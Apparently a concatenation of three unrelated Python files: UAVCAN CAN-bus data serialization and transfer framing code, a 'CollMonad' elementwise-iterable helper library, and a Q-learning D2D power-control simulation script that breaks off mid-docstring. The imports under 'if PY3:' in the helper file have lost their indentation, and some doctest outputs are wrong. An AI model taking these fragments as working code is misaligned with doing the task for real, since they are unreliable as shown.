        elif self._type.kind == dsdl.PrimitiveType.KIND_FLOAT:
            new_value = cast(new_value, self._type)
            # Obtain the integer bit pattern, then render it as a bit string
            if self._type.bitlen == 16:
                int_value = f16_from_f32(new_value)
            elif self._type.bitlen == 32:
                int_value = struct.unpack("<L", struct.pack("<f", new_value))[0]
            elif self._type.bitlen == 64:
                int_value = struct.unpack("<Q", struct.pack("<d", new_value))[0]
            else:
                raise ValueError('Bad float, no donut')
            self._bits = format(int_value, "0" + str(self._type.bitlen) + "b")
# noinspection PyProtectedMember
class ArrayValue(BaseValue, MutableSequence):
    """DSDL array value (static or dynamic) behaving as a mutable sequence.

    Elements are wrapper objects (PrimitiveValue, ArrayValue or CompoundValue)
    built around the array's DSDL element type.  String-like byte arrays also
    support encode()/decode().
    """
    def __init__(self, _uavcan_type, *args, **kwargs):
        super(ArrayValue, self).__init__(_uavcan_type, *args, **kwargs)
        # Choose the constructor used for new elements from the element type
        if isinstance(self._type.value_type, dsdl.PrimitiveType):
            self.__item_ctor = functools.partial(PrimitiveValue, self._type.value_type)
        elif isinstance(self._type.value_type, dsdl.ArrayType):
            self.__item_ctor = functools.partial(ArrayValue, self._type.value_type)
        elif isinstance(self._type.value_type, dsdl.CompoundType):
            self.__item_ctor = functools.partial(CompoundValue, self._type.value_type)
        # Static arrays are pre-populated to their fixed size
        if self._type.mode == dsdl.ArrayType.MODE_STATIC:
            self.__items = list(self.__item_ctor() for _ in range(self._type.max_size))
        else:
            self.__items = []
    def __repr__(self):
        return "ArrayValue(type={0!r}, items={1!r})".format(self._type, self.__items)
    def __str__(self):
        # String-like arrays display as their decoded text when possible
        if self._type.is_string_like:
            # noinspection PyBroadException
            try:
                return self.decode()
            except Exception:
                pass
        return self.__repr__()
    def __getitem__(self, idx):
        # Primitive elements unwrap to their Python value (0 when unset)
        if isinstance(self.__items[idx], PrimitiveValue):
            return self.__items[idx].value if self.__items[idx]._bits else 0
        else:
            return self.__items[idx]
    def __setitem__(self, idx, value):
        if idx >= self._type.max_size:
            raise IndexError("Index {0} too large (max size {1})".format(idx, self._type.max_size))
        if isinstance(self._type.value_type, dsdl.PrimitiveType):
            self.__items[idx].value = value
        else:
            self.__items[idx] = value
    def __delitem__(self, idx):
        del self.__items[idx]
    def __len__(self):
        return len(self.__items)
    def __eq__(self, other):
        # Strings compare against the decoded contents; everything else
        # compares element-wise as a list
        if isinstance(other, str):
            return self.decode() == other
        else:
            return list(self) == other
    def clear(self):
        try:
            while True:
                self.pop()
        except IndexError:
            pass
    def new_item(self):
        """Construct a fresh, empty element of the array's element type."""
        return self.__item_ctor()
    def insert(self, idx, value):
        if idx >= self._type.max_size:
            raise IndexError("Index {0} too large (max size {1})".format(idx, self._type.max_size))
        elif len(self) == self._type.max_size:
            raise IndexError("Array already full (max size {0})".format(self._type.max_size))
        if isinstance(self._type.value_type, dsdl.PrimitiveType):
            # Primitives must be wrapped before insertion
            new_item = self.__item_ctor()
            new_item.value = value
            self.__items.insert(idx, new_item)
        else:
            self.__items.insert(idx, value)
    def _unpack(self, stream, tao):
        # tao: when True for a dynamic array of >=8-bit items, the length
        # prefix is omitted and the array consumes the rest of the stream
        # (tail-array optimization)
        if self._type.mode == dsdl.ArrayType.MODE_STATIC:
            for _, last, i in enum_mark_last(range(self._type.max_size)):
                stream = self.__items[i]._unpack(stream, tao and last)
        elif tao and self._type.value_type.get_min_bitlen() >= 8:
            del self[:]
            while len(stream) >= 8:
                new_item = self.__item_ctor()
                stream = new_item._unpack(stream, False)
                self.__items.append(new_item)
            stream = ''
        else:
            # Length-prefixed form: element count first, then the elements
            del self[:]
            count_width = array_len_bits_from_max_size(self._type.max_size)
            count = int(be_from_le_bits(stream[0:count_width], count_width), 2)
            stream = stream[count_width:]
            for _, last, i in enum_mark_last(range(count)):
                new_item = self.__item_ctor()
                stream = new_item._unpack(stream, tao and last)
                self.__items.append(new_item)
        return stream
    def _pack(self, tao):
        self.__items = self.__items[:self._type.max_size]  # Constrain max len
        if self._type.mode == dsdl.ArrayType.MODE_STATIC:
            while len(self) < self._type.max_size:  # Constrain min len
                self.__items.append(self.new_item())
            return ''.join(i._pack(tao and last) for _, last, i in enum_mark_last(self.__items))
        elif tao and self._type.value_type.get_min_bitlen() >= 8:
            # Tail-array optimization: no length prefix
            return ''.join(i._pack(False) for i in self.__items)
        else:
            count_width = array_len_bits_from_max_size(self._type.max_size)
            count = le_from_be_bits(format(len(self), '0{0:1d}b'.format(count_width)), count_width)
            return count + ''.join(i._pack(tao and last) for _, last, i in enum_mark_last(self.__items))
    def from_bytes(self, value):
        """Replace the contents with the bytes of *value*."""
        del self[:]
        for byte in bytearray(value):
            self.append(byte)
    def to_bytes(self):
        """Return the populated elements as a bytes object."""
        return bytes(bytearray(item.value for item in self.__items if item._bits))
    def encode(self, value, errors='strict'):
        """Replace the contents with *value* encoded as UTF-8 bytes."""
        if not self._type.is_string_like:
            raise ValueError('encode() can be used only with string-like arrays')
        del self[:]
        value = bytearray(value, encoding="utf-8", errors=errors)
        for byte in value:
            self.append(byte)
    def decode(self, encoding="utf-8"):
        """Return the populated elements decoded as text."""
        if not self._type.is_string_like:
            raise ValueError('decode() can be used only with string-like arrays')
        return bytearray(item.value for item in self.__items if item._bits).decode(encoding)
# noinspection PyProtectedMember
class CompoundValue(BaseValue):
    """DSDL message/service value composed of named fields and constants.

    Fields are exposed as plain attributes via the custom __getattr__ /
    __setattr__ below.  Union types keep exactly one active field; service
    types must be constructed with _mode='request' or _mode='response' to
    select the corresponding field set.
    """
    def __init__(self, _uavcan_type, _mode=None, *args, **kwargs):
        # Assign through __dict__ to bypass the custom __setattr__ below
        self.__dict__["_fields"] = collections.OrderedDict()
        self.__dict__["_constants"] = {}
        super(CompoundValue, self).__init__(_uavcan_type, *args, **kwargs)
        if self._type.kind == dsdl.CompoundType.KIND_SERVICE:
            if _mode == "request":
                source_fields = self._type.request_fields
                source_constants = self._type.request_constants
                self._is_union = self._type.request_union
            elif _mode == "response":
                source_fields = self._type.response_fields
                source_constants = self._type.response_constants
                self._is_union = self._type.response_union
            else:
                raise ValueError("mode must be either 'request' or 'response' for service types")
        else:
            if _mode is not None:
                raise ValueError("mode is not applicable for message types")
            source_fields = self._type.fields
            source_constants = self._type.constants
            self._is_union = self._type.union
        self._mode = _mode
        self._union_field = None
        for constant in source_constants:
            self._constants[constant.name] = constant.value
        # Build a wrapper value object for each declared field
        for idx, field in enumerate(source_fields):
            if isinstance(field.type, dsdl.VoidType):
                self._fields["_void_{0}".format(idx)] = VoidValue(field.type)
            elif isinstance(field.type, dsdl.PrimitiveType):
                self._fields[field.name] = PrimitiveValue(field.type)
            elif isinstance(field.type, dsdl.ArrayType):
                self._fields[field.name] = ArrayValue(field.type)
            elif isinstance(field.type, dsdl.CompoundType):
                self._fields[field.name] = CompoundValue(field.type)
        # Remaining keyword arguments initialize fields by name
        for name, value in kwargs.items():
            if name.startswith('_'):
                raise NameError('%r is not a valid field name' % name)
            setattr(self, name, value)
    def __repr__(self):
        if self._is_union:
            field = self._union_field or list(self._fields.keys())[0]
            fields = "{0}={1!r}".format(field, self._fields[field])
        else:
            fields = ", ".join("{0}={1!r}".format(f, v) for f, v in self._fields.items() if not f.startswith("_void_"))
        return "{0}({1})".format(self._type.full_name, fields)
    def __copy__(self):
        # http://stackoverflow.com/a/15774013/1007777
        cls = self.__class__
        result = cls.__new__(cls)
        result.__dict__.update(self.__dict__)
        return result
    def __deepcopy__(self, memo):
        # http://stackoverflow.com/a/15774013/1007777
        cls = self.__class__
        result = cls.__new__(cls)
        memo[id(self)] = result
        for k, v in self.__dict__.items():
            # noinspection PyArgumentList
            result.__dict__[k] = copy.deepcopy(v, memo)
        return result
    def __getattr__(self, attr):
        # Constants take precedence over fields; reading a union field makes
        # it the active field (or raises if a different field is active)
        if attr in self._constants:
            return self._constants[attr]
        elif attr in self._fields:
            if self._is_union:
                if self._union_field and self._union_field != attr:
                    raise AttributeError(attr)
                else:
                    self._union_field = attr
            if isinstance(self._fields[attr], PrimitiveValue):
                return self._fields[attr].value
            else:
                return self._fields[attr]
        else:
            raise AttributeError(attr)
    def __setattr__(self, attr, value):
        if attr in self._constants:
            raise AttributeError(attr + " is read-only")
        elif attr in self._fields:
            if self._is_union:
                if self._union_field and self._union_field != attr:
                    raise AttributeError(attr)
                else:
                    self._union_field = attr
            # noinspection PyProtectedMember
            attr_type = self._fields[attr]._type
            if isinstance(attr_type, dsdl.PrimitiveType):
                self._fields[attr].value = value
            elif isinstance(attr_type, dsdl.CompoundType):
                # Compound fields accept only a matching CompoundValue, which
                # is shallow-copied in
                if not isinstance(value, CompoundValue):
                    raise AttributeError('Invalid type of the value, expected CompoundValue, got %r' % type(value))
                if attr_type.full_name != get_uavcan_data_type(value).full_name:
                    raise AttributeError('Incompatible type of the value, expected %r, got %r' %
                                         (attr_type.full_name, get_uavcan_data_type(value).full_name))
                self._fields[attr] = copy.copy(value)
            elif isinstance(attr_type, dsdl.ArrayType):
                # Array fields are rebuilt from a string or an iterable
                self._fields[attr].clear()
                try:
                    if isinstance(value, str):
                        self._fields[attr].encode(value)
                    else:
                        for item in value:
                            self._fields[attr].append(item)
                except Exception as ex:
                    # We should be using 'raise from' here, but unfortunately we have to be compatible with 2.7
                    raise AttributeError('Array field could not be constructed from the provided value', ex)
            else:
                raise AttributeError(attr + " cannot be set directly")
        else:
            super(CompoundValue, self).__setattr__(attr, value)
    def _unpack(self, stream, tao=True):
        if self._is_union:
            # A union serializes as a tag selecting the field, then the field
            tag_len = union_tag_bits_from_num_elements(len(self._fields))
            self._union_field = list(self._fields.keys())[int(stream[0:tag_len], 2)]
            stream = self._fields[self._union_field]._unpack(stream[tag_len:], tao)
        else:
            for _, last, field in enum_mark_last(self._fields.values()):
                stream = field._unpack(stream, tao and last)
        return stream
    def _pack(self, tao=True):
        if self._is_union:
            keys = list(self._fields.keys())
            field = self._union_field or keys[0]
            tag = keys.index(field)
            tag_len = union_tag_bits_from_num_elements(len(self._fields))
            return format(tag, '0' + str(tag_len) + 'b') + self._fields[field]._pack(tao)
        else:
            return ''.join(field._pack(tao and last) for _, last, field in enum_mark_last(self._fields.values()))
class Frame(object):
    """A single CAN frame: message ID plus payload bytes.

    The last payload byte is the tail byte carrying the transfer bookkeeping
    flags (start/end/toggle) and the 5-bit transfer ID.
    """

    def __init__(self, message_id, data, ts_monotonic=None, ts_real=None):  # @ReservedAssignment
        self.message_id = message_id
        self.bytes = bytearray(data)
        self.ts_monotonic = ts_monotonic
        self.ts_real = ts_real

    def _tail_flag(self, mask):
        # Test a flag bit in the tail byte; an empty frame has no flags set
        return bool(self.bytes[-1] & mask) if self.bytes else False

    @property
    def transfer_key(self):
        # The transfer is uniquely identified by the message ID and the 5-bit
        # Transfer ID contained in the last byte of the frame payload.
        return self.message_id, (self.bytes[-1] & 0x1F) if self.bytes else None

    @property
    def toggle(self):
        return self._tail_flag(0x20)

    @property
    def end_of_transfer(self):
        return self._tail_flag(0x40)

    @property
    def start_of_transfer(self):
        return self._tail_flag(0x80)
class TransferError(uavcan.UAVCANException):
    """Raised when a transfer cannot be decoded or reassembled from frames."""
    pass
class Transfer(object):
    """A UAVCAN transfer: a serialized payload plus addressing metadata,
    convertible to and from a sequence of CAN frames.
    """
    DEFAULT_TRANSFER_PRIORITY = 31
    def __init__(self,
                 transfer_id=0,
                 source_node_id=0,
                 dest_node_id=None,
                 payload=None,
                 transfer_priority=None,
                 request_not_response=False,
                 service_not_message=False,
                 discriminator=None):
        self.transfer_priority = transfer_priority if transfer_priority is not None else self.DEFAULT_TRANSFER_PRIORITY
        self.transfer_id = transfer_id
        self.source_node_id = source_node_id
        self.dest_node_id = dest_node_id
        self.data_type_signature = 0
        self.request_not_response = request_not_response
        self.service_not_message = service_not_message
        self.discriminator = discriminator
        self.ts_monotonic = None
        self.ts_real = None
        if payload:
            # Serialize the payload now and capture its type metadata
            # noinspection PyProtectedMember
            payload_bits = payload._pack()
            if len(payload_bits) & 7:
                # Zero-pad up to a whole number of bytes
                payload_bits += "0" * (8 - (len(payload_bits) & 7))
            self.payload = bytes_from_bits(payload_bits)
            self.data_type_id = get_uavcan_data_type(payload).default_dtid
            self.data_type_signature = get_uavcan_data_type(payload).get_data_type_signature()
            self.data_type_crc = get_uavcan_data_type(payload).base_crc
        else:
            self.payload = None
            self.data_type_id = None
            self.data_type_signature = None
            self.data_type_crc = None
        self.is_complete = True if self.payload else False
    def __repr__(self):
        return "Transfer(id={0}, source_node_id={1}, dest_node_id={2}, transfer_priority={3}, payload={4!r})"\
            .format(self.transfer_id, self.source_node_id, self.dest_node_id, self.transfer_priority, self.payload)
    @property
    def message_id(self):
        """Build the 29-bit CAN message ID from the transfer metadata."""
        # Common fields
        id_ = (((self.transfer_priority & 0x1F) << 24) |
               (int(self.service_not_message) << 7) |
               (self.source_node_id or 0))
        if self.service_not_message:
            assert 0 <= self.data_type_id <= 0xFF
            assert 1 <= self.dest_node_id <= 0x7F
            # Service frame format
            id_ |= self.data_type_id << 16
            id_ |= int(self.request_not_response) << 15
            id_ |= self.dest_node_id << 8
        elif self.source_node_id == 0:
            assert self.dest_node_id is None
            assert self.discriminator is not None
            # Anonymous message frame format
            id_ |= self.discriminator << 10
            id_ |= (self.data_type_id & 0x3) << 8
        else:
            assert 0 <= self.data_type_id <= 0xFFFF
            # Message frame format
            id_ |= self.data_type_id << 8
        return id_
    @message_id.setter
    def message_id(self, value):
        """Decode transfer metadata from a 29-bit CAN message ID."""
        self.transfer_priority = (value >> 24) & 0x1F
        self.service_not_message = bool(value & 0x80)
        self.source_node_id = value & 0x7F
        if self.service_not_message:
            self.data_type_id = (value >> 16) & 0xFF
            self.request_not_response = bool(value & 0x8000)
            self.dest_node_id = (value >> 8) & 0x7F
        elif self.source_node_id == 0:
            # Anonymous message frame format
            self.discriminator = (value >> 10) & 0x3FFF
            self.data_type_id = (value >> 8) & 0x3
        else:
            self.data_type_id = (value >> 8) & 0xFFFF
    def to_frames(self):
        """Split the payload into CAN frames (7 data bytes + tail byte each)."""
        out_frames = []
        remaining_payload = self.payload
        # Prepend the transfer CRC to the payload if the transfer requires
        # multiple frames
        if len(remaining_payload) > 7:
            crc = common.crc16_from_bytes(self.payload,
                                          initial=self.data_type_crc)
            remaining_payload = bytearray([crc & 0xFF, crc >> 8]) + remaining_payload
        # Generate the frame sequence
        tail = 0x20  # set toggle bit high so the first frame is emitted with it cleared
        while True:
            # Tail byte contains start-of-transfer, end-of-transfer, toggle, and Transfer ID
            tail = ((0x80 if len(out_frames) == 0 else 0) |
                    (0x40 if len(remaining_payload) <= 7 else 0) |
                    ((tail ^ 0x20) & 0x20) |
                    (self.transfer_id & 0x1F))
            out_frames.append(Frame(message_id=self.message_id, data=remaining_payload[0:7] + bchr(tail)))
            remaining_payload = remaining_payload[7:]
            if not remaining_payload:
                break
        return out_frames
    def from_frames(self, frames):
        """Reassemble and deserialize this transfer from a frame sequence.

        Raises TransferError on inconsistent tail-byte flags, unknown data
        type, or CRC mismatch.
        """
        # Initialize transfer timestamps from the first frame
        self.ts_monotonic = frames[0].ts_monotonic
        self.ts_real = frames[0].ts_real
        # Validate the flags in the tail byte
        expected_toggle = 0
        expected_transfer_id = frames[0].bytes[-1] & 0x1F
        for idx, f in enumerate(frames):
            tail = f.bytes[-1]
            if (tail & 0x1F) != expected_transfer_id:
                raise TransferError("Transfer ID {0} incorrect, expected {1}".format(tail & 0x1F, expected_transfer_id))
            elif idx == 0 and not (tail & 0x80):
                raise TransferError("Start of transmission not set on frame 0")
            elif idx > 0 and tail & 0x80:
                raise TransferError("Start of transmission set unexpectedly on frame {0}".format(idx))
            elif idx == len(frames) - 1 and not (tail & 0x40):
                raise TransferError("End of transmission not set on last frame")
            elif idx < len(frames) - 1 and (tail & 0x40):
                raise TransferError("End of transmission set unexpectedly on frame {0}".format(idx))
            elif (tail & 0x20) != expected_toggle:
                raise TransferError("Toggle bit value {0} incorrect on frame {1}".format(tail & 0x20, idx))
            expected_toggle ^= 0x20
        self.transfer_id = expected_transfer_id
        self.message_id = frames[0].message_id
        # Concatenate the data portions (all bytes except each tail byte)
        payload_bytes = bytearray(b''.join(bytes(f.bytes[0:-1]) for f in frames))
        # Find the data type
        if self.service_not_message:
            kind = dsdl.CompoundType.KIND_SERVICE
        else:
            kind = dsdl.CompoundType.KIND_MESSAGE
        datatype = uavcan.DATATYPES.get((self.data_type_id, kind))
        if not datatype:
            raise TransferError("Unrecognised {0} type ID {1}"
                                .format("service" if self.service_not_message else "message", self.data_type_id))
        # For a multi-frame transfer, validate the CRC and frame indexes
        if len(frames) > 1:
            # The first two payload bytes are the little-endian transfer CRC
            transfer_crc = payload_bytes[0] + (payload_bytes[1] << 8)
            payload_bytes = payload_bytes[2:]
            crc = common.crc16_from_bytes(payload_bytes, initial=datatype.base_crc)
            if crc != transfer_crc:
                raise TransferError("CRC mismatch: expected {0:x}, got {1:x} for payload {2!r} (DTID {3:d})"
                                    .format(crc, transfer_crc, payload_bytes, self.data_type_id))
        self.data_type_id = datatype.default_dtid
        self.data_type_signature = datatype.get_data_type_signature()
        self.data_type_crc = datatype.base_crc
        if self.service_not_message:
            self.payload = datatype(_mode="request" if self.request_not_response else "response")
        else:
            self.payload = datatype()
        # noinspection PyProtectedMember
        self.payload._unpack(bits_from_bytes(payload_bytes))
    @property
    def key(self):
        # Uniquely identifies this transfer among concurrent ones
        return self.message_id, self.transfer_id
    def is_response_to(self, transfer):
        """Return True if this transfer is the service response matching the
        given request *transfer*."""
        if (transfer.service_not_message and self.service_not_message and
                transfer.request_not_response and
                not self.request_not_response and
                transfer.dest_node_id == self.source_node_id and
                transfer.source_node_id == self.dest_node_id and
                transfer.data_type_id == self.data_type_id and
                transfer.transfer_id == self.transfer_id):
            return True
        else:
            return False
class TransferManager(object):
    """Reassembles multi-frame transfers from individually received frames."""

    def __init__(self):
        # Maps frame.transfer_key -> list of frames received so far
        self.active_transfers = {}
        # Maps frame.transfer_key -> monotonic timestamp of the last frame
        self.active_transfer_timestamps = {}

    def receive_frame(self, frame):
        """Accumulate *frame* into its transfer.

        Returns the complete list of frames when *frame* ends a transfer,
        otherwise None.  Frames for unknown transfers that are not a
        start-of-transfer are ignored.
        """
        result = None
        key = frame.transfer_key
        if key in self.active_transfers or frame.start_of_transfer:
            # If the first frame was received, restart this transfer from scratch
            if frame.start_of_transfer:
                self.active_transfers[key] = []
            self.active_transfers[key].append(frame)
            self.active_transfer_timestamps[key] = time.monotonic()
            # If the last frame of a transfer was received, return its frames
            if frame.end_of_transfer:
                result = self.active_transfers[key]
                del self.active_transfers[key]
                del self.active_transfer_timestamps[key]
        return result

    def remove_inactive_transfers(self, timeout=1.0):
        """Drop partially-received transfers idle for more than *timeout* seconds."""
        now = time.monotonic()
        # Iterate over a snapshot: deleting from a dict while iterating its
        # live .keys() view raises RuntimeError on Python 3.
        for key in list(self.active_transfers.keys()):
            if now - self.active_transfer_timestamps[key] > timeout:
                del self.active_transfers[key]
                del self.active_transfer_timestamps[key]
|
<reponame>Jon-Burr/dbobj
from builtins import zip
from future.utils import PY3, iteritems
from itertools import repeat
import operator
if PY3:
from collections.abc import Iterator, Iterable
else:
from collections import Iterator, Iterable
class CollMonad(Iterable):
    """ Special type of iterable that allows forwarding attribute retrieval,
    function calls, etc to the iterated objects.
    The examples here show ItrMonad but TupleMonad works in the same way
    Operators can be forwarded
    >>> itr = ItrMonad(iter([0, 1, 2, 3, 4, 5]))
    >>> list(itr * 2 + 1)
    [1, 3, 5, 7, 9, 11]
    As can member function calls
    >>> itr = ItrMonad(iter(["Hello {0}", "Goodbye {0}"]))
    >>> list(itr.format("World"))
    ["Hello World", "Goodbye World"]
    If a provided argument is an iterator, it will be izipped together when
    called
    >>> itr1 = ItrMonad(iter([0, 1, 2, 3, 4, 5]))
    >>> itr2 = ItrMonad(iter([0, 2, 4, 6, 8]))
    >>> list(itr1 + itr2)
    [0, 3, 6, 9, 12]
    Note here that the normal izip behaviour of ending when the shortest
    iterator is exhausted is preserved.
    A non member function can also be called using apply
    >>> itr1 = iter([0, 1, 2, 3, 4, 5])
    >>> list(ItrMonad.apply(str.format, "x = {0}", itr1))
    ['x = 0', 'x = 1', 'x = 2', 'x = 3', 'x = 4', 'x = 5']
    The class also provides special methods for doing element-wise boolean
    operations with the expected short-circuiting behaviour. This example
    uses TupleMonad to avoid having to redeclare the initial tuple but the
    behaviour is the same for ItrMonad.
    >>> tup1 = TupleMonad([0, 1, 2, 3, 4, 5])
    >>> TupleMonad.and_(tup1 > 2, tup1 < 4)
    TupleMonad(False, False, False, True, False, False)
    >>> TupleMonad.or_(tup1 < 2, tup1 > 4)
    TupleMonad(True, True, False, False, False, True)
    >>> TupleMonad.all(tup1 > 1, tup1 < 4, tup1 % 2 == 0)
    TupleMonad(False, False, True, False, False, False)
    >>> TupleMonad.any(tup1 < 1, tup1 > 4, tup1 % 3 == 0)
    TupleMonad(True, False, False, True, False, True)
    There is also a special in_ method for checking membership
    >>> tup1 = TupleMonad([0, 1, 2, 3, 4, 5])
    >>> TupleMonad.in_(tup1, (0, 3, 4))
    TupleMonad(True, False, False, True, True, False)
    """
    @classmethod
    def apply(cls, func, *args, **kwargs):
        """ Apply a function elementwise for iterables
        Any argument that is not an Iterator will be replaced by
        itertools.repeat. This means that if no arguments are iterators, the
        returned iterator will never be exhausted!
        Note that this uses Iterators, rather than Iterables to avoid
        zipping objects like strings.
        """
        def to_repeat(x):
            # Note the use of CollMonad here rather than cls - this is to avoid
            # derived classes not counting each other properly
            if isinstance(x, (CollMonad, Iterator)):
                return x
            else:
                return repeat(x)
        # Make any arguments that aren't generators into 'repeat' functions
        args = [to_repeat(a) for a in args]
        # Make any kwargs the same
        if kwargs:
            # zip the values together
            kwargs = {k: to_repeat(v) for k, v in iteritems(kwargs)}
            # and then zip them back together with the original keys
            g_kw = (dict(zip(kwargs.keys(), vs)) for vs in zip(*kwargs.values()))
        else:
            g_kw = repeat({})
        # The kwargs dict generator rides along as the last 'argument'
        args.append(g_kw)
        return cls(func(*a[:-1], **a[-1]) for a in zip(*args))
    @classmethod
    def in_(cls, lhs, rhs):
        """ Elementwise 'lhs in rhs' """
        return cls.apply(lambda x, y: x in y, lhs, rhs)
    @classmethod
    def and_(cls, lhs, rhs):
        """ Elementwise 'and' of lhs and rhs """
        return cls.apply(lambda x, y: x and y, lhs, rhs)
    @classmethod
    def or_(cls, lhs, rhs):
        """ Elementwise 'or' of lhs and rhs """
        return cls.apply(lambda x, y: x or y, lhs, rhs)
    @classmethod
    def any(cls, *args):
        """ Apply the any function elementwise """
        return cls.apply(lambda *args: any(args), *args)
    @classmethod
    def all(cls, *args):
        """ Apply the all function elementwise """
        return cls.apply(lambda *args: all(args), *args)
    @classmethod
    def flatten(cls, iterable, cls_tup=None, no_expand=None):
        """ Flatten an arbitarily (modulo stack limit) nested iterable
        By default this only expands CollMonads, Iterators, lists and tuples
        (to avoid unfolding strings) but this can be modified by passing a
        tuple of types to expand to cls_tup. Types can be excluded from the
        expansion by passing a tuple to no_expand
        """
        if cls_tup is None:
            cls_tup = (CollMonad, Iterator, list, tuple)
        if no_expand is None:
            no_expand = ()
        def iter_flatten(itrbl):
            itr = iter(itrbl)
            for ele in itr:
                if isinstance(ele, cls_tup) and not isinstance(ele, no_expand):
                    for ele2 in iter_flatten(ele):
                        yield ele2
                else:
                    yield ele
        return cls(iter_flatten(iterable))
    def call(self, func, *args, **kwargs):
        """ Call the given function for each member of the iterable with that
        member as the first argument
        args and kwargs are provided as arguments
        """
        args = (self,) + args
        return type(self).apply(func, *args, **kwargs)
    def __getattr__(self, name):
        """ Return an iterator getting the attribute over all elements """
        return self.call(getattr, name)
    def __call__(self, *args, **kwargs):
        """ If this is an iterable of callables, then call them elementwise with
        the provided arguments
        """
        def do_call(self, *args, **kwargs):
            return self(*args, **kwargs)
        return self.call(do_call, *args, **kwargs)
    def __eq__(self, other):
        return self.call(operator.eq, other)
    def __ne__(self, other):
        return self.call(operator.ne, other)
    def __gt__(self, other):
        return self.call(operator.gt, other)
    def __ge__(self, other):
        return self.call(operator.ge, other)
    def __le__(self, other):
        return self.call(operator.le, other)
    def __lt__(self, other):
        return self.call(operator.lt, other)
    def __add__(self, other):
        return self.call(operator.add, other)
    def __sub__(self, other):
        return self.call(operator.sub, other)
    def __mul__(self, other):
        return self.call(operator.mul, other)
    def __div__(self, other):
        # Python 2 dispatches '/' (classic division) here; operator.div only
        # exists on Python 2, and this method is never reached on Python 3.
        return self.call(operator.div, other)
    def __truediv__(self, other):
        # BUGFIX: Python 3 dispatches '/' to __truediv__, which the original
        # class never defined (and operator.div was removed in Python 3), so
        # elementwise division raised TypeError on PY3.
        return self.call(operator.truediv, other)
    def __abs__(self):
        return self.call(operator.abs)
    def __mod__(self, other):
        return self.call(operator.mod, other)
    def __and__(self, other):
        return self.call(operator.and_, other)
    def __or__(self, other):
        return self.call(operator.or_, other)
class ItrMonad(CollMonad, Iterator):
    """ CollMonad that acts as an iterator
    Only valid for a single pass, but likely to be more efficient for most
    operations (each individual calculation can short circuit, for example)
    If the iterator has side effects, it can be run through by calling
    invoke. After this the iterator will be exhausted.
    """
    def __init__(self, itr):
        # iter() on an object that is already an iterator returns it
        # unchanged, so normalise unconditionally only when needed.
        self._itr = itr if isinstance(itr, Iterator) else iter(itr)
    def __iter__(self):
        return self
    def invoke(self):
        """ Evaluate the iterator, causing any side effects to occur """
        for _ in self:
            pass
    if PY3:
        def __next__(self):
            return next(self._itr)
    else:
        def next(self):
            return next(self._itr)
class TupleMonad(CollMonad):
    """ CollMonad that acts as a tuple
    The whole result of the calculation is stored and can be iterated
    through multiple times.
    Has a helper 'select' function that returns a filtered result
    >>> tup = TupleMonad([0, 1, 2, 3, 4, 5])
    >>> tup.select(tup % 2 == 0)
    TupleMonad(0, 2, 4)
    """
    def __init__(self, itr):
        # Materialise immediately so the monad can be re-iterated.
        self._tup = tuple(itr)
    def __iter__(self):
        return ItrMonad(self._tup)
    def __str__(self):
        return str(self._tup)
    def __repr__(self):
        return "TupleMonad{0}".format(self._tup)
    def __len__(self):
        return len(self._tup)
    def __contains__(self, x):
        return x in self._tup
    def select(self, selection):
        """ Keep only the elements whose matching flag in *selection* is truthy """
        kept = (value for value, keep in zip(self, selection) if keep)
        return TupleMonad(kept)
|
<filename>scripts2/script2_1.py
# Simulation implemented for the Distributed-Q Learning Based Power Control algorithm found in
# <NAME>., <NAME>., <NAME>., <NAME>. and <NAME>., 2016, September. Q-learning based power control algorithm for D2D communication.
# In 2016 IEEE 27th Annual International Symposium on Personal, Indoor, and Mobile Radio Communications
# (PIMRC) (pp. 1-6). IEEE.
# devices positions are fixed.
import sys
import os
lucas_path = os.environ['LUCAS_PATH']
sys.path.insert(1, lucas_path)
from general import general as gen
from devices.devices import node, base_station, mobile_user, d2d_user, d2d_node_type
from pathloss import pathloss
from plots.plots import plot_positions, plot_spectral_effs
from q_learning.environments.distributedEnvironment import DistributedEnvironment
from q_learning.agents.agent import Agent
from q_learning.q_table import DistributedQTable
from q_learning import rewards
from parameters.parameters import EnvironmentParameters, TrainingParameters, AgentParameters, LearningParameters
from typing import List
import math
import copy
import numpy as np
import matplotlib.pyplot as plt
# --- Scenario parameters (units noted per line) ---
n_mues = 1  # number of mues
n_d2d = 10  # number of d2d pairs
n_rb = n_mues  # number of RBs
bs_radius = 500  # bs radius in m
rb_bandwidth = 180*1e3  # rb bandwidth in Hz
d2d_pair_distance = 50  # d2d pair distance in m
p_max = 23  # max tx power in dBm
noise_power = -116  # noise power per RB in dBm
bs_gain = 17  # macro bs antenna gain in dBi
user_gain = 4  # user antenna gain in dBi
sinr_threshold = 6  # mue sinr threshold in dB
# conversions from dB to pow
# (the "- 30" steps convert dBm -> dB relative to 1 W before db_to_power)
p_max = p_max - 30
p_max = gen.db_to_power(p_max)
noise_power = noise_power - 30
noise_power = gen.db_to_power(noise_power)
bs_gain = gen.db_to_power(bs_gain)
user_gain = gen.db_to_power(user_gain)
sinr_threshold = gen.db_to_power(sinr_threshold)
# q-learning parameters
# MAX_NUM_EPISODES = 1e5
MAX_NUM_EPISODES = 3000
# STEPS_PER_EPISODE = 400
STEPS_PER_EPISODE = 200
EPSILON_MIN = 0.05
# max_num_steps = MAX_NUM_EPISODES * STEPS_PER_EPISODE
# MAX_NUM_STEPS = 50
# EPSILON_DECAY = 4e-2 * EPSILON_MIN / STEPS_PER_EPISODE
EPSILON_DECAY = 1.5/MAX_NUM_EPISODES
# EPSILON_DECAY = 2 * EPSILON_MIN / MAX_NUM_STEPS
ALPHA = 0.2  # Learning rate
GAMMA = 0.98  # Discount factor
C = 80  # C constant for the improved reward function
# more parameters
env_params = EnvironmentParameters(rb_bandwidth, d2d_pair_distance, p_max, noise_power, bs_gain, user_gain, sinr_threshold,
                                   n_mues, n_d2d, n_rb, bs_radius, c_param=C)
train_params = TrainingParameters(MAX_NUM_EPISODES, STEPS_PER_EPISODE)
agent_params = AgentParameters(EPSILON_MIN, EPSILON_DECAY, 1)
learn_params = LearningParameters(ALPHA, GAMMA)
actions = [i*0.82*p_max/5/1000 for i in range(5)]  # best result
agents = [Agent(agent_params, actions) for i in range(n_d2d)]  # 1 agent per d2d tx
q_tables = [DistributedQTable(2, len(actions), learn_params) for a in agents]
reward_function = rewards.dis_reward
environment = DistributedEnvironment(env_params, reward_function)
# training function
# TODO (translated from Portuguese): put the agent and the d2d_device in the
# same class? make a d2d_device property on the agent?
def train(agents: List[Agent], env: DistributedEnvironment, params: TrainingParameters, q_tables: List[DistributedQTable]):
    """Train one distributed Q-table per D2D agent on *env*.

    :param agents: one Agent per D2D transmitter
